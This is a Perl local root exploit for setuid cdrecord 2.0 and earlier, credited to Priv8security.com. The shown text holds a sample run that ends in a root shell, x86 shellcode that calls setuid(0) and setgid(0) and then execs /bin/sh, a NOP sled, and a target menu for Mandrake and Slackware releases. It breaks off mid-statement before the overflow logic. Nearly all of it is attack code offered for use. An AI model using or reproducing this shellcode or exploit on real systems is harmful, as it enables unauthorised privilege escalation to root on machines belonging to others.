1 #!/usr/bin/perl
2 ###########################################################
3 # Cdrecord version 2.0 and < local root exploit.
4 #
5 #
6 # [wsxz@localhost buffer]$ perl priv8cdr.pl 4
7 # Using target number 4
8 # Using Mr .dtors 0x808c82c
9 # Cdrecord 2.0 (i586−mandrake−linux−gnu)
10 #
11 # scsibus: −1 target: −1 lun: −1
12 # Warning: Open by ’devname’ is unintentional and not supported.
13 # /usr/bin/cdrecord: No such file or directory. Cannot open ’. Cannot open SCSI driver.
14 # /usr/bin/cdrecord: For possible targets try ’cdrecord −scanbus’. Make sure you are root.
15 # /usr/bin/cdrecord: For possible transport specifiers try ’cdrecord dev=help’.
16 # sh−2.05b# id
17 # uid=0(root) gid=0(root) groups=503(wsxz)
18 # sh−2.05b#
19 #####################################################
20
21
$shellcode =
22 "\x31\xc0\x31\xdb\xb0\x17\xcd\x80".#setuid 0
23
"\x31\xdb\x89\xd8\xb0\x2e\xcd\x80".#setgid 0
24
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89".
25 "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c".
26 "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
27 "\xff\xff/bin/sh";
28
29
$cdrecordpath = "/usr/bin/cdrecord";
30
$nop = "\x90"; # x86 NOP
31 $offset = 0; # Default offset to try.
32
33
34 if (@ARGV == 1 || @ARGV == 2) {
35 $target = $ARGV[0];
36 $offset = $ARGV[1];
37
}else{
38
printf(" Priv8security.com Cdrecord local root exploit!!\n");
39
printf(" usage: $0 target\n");
40
printf(" List of targets:\n");
41
printf(" 1 − Linux Mandrake 8.2 Cdrecord 1.11a15\n");
42 printf(" 2 − Linux Mandrake 9.0 Cdrecord 1.11a32\n");
43 printf(" 3 − Linux Slackware 8.1 Cdrecord 1.11a24 not suid by default!!!\n");
44
printf(" 4 − Linux Mandrake 9.1 Cdrecord 2.0\n");
45
exit(1);
46
}
47
48 if ( $target eq "1" ) {
49 $r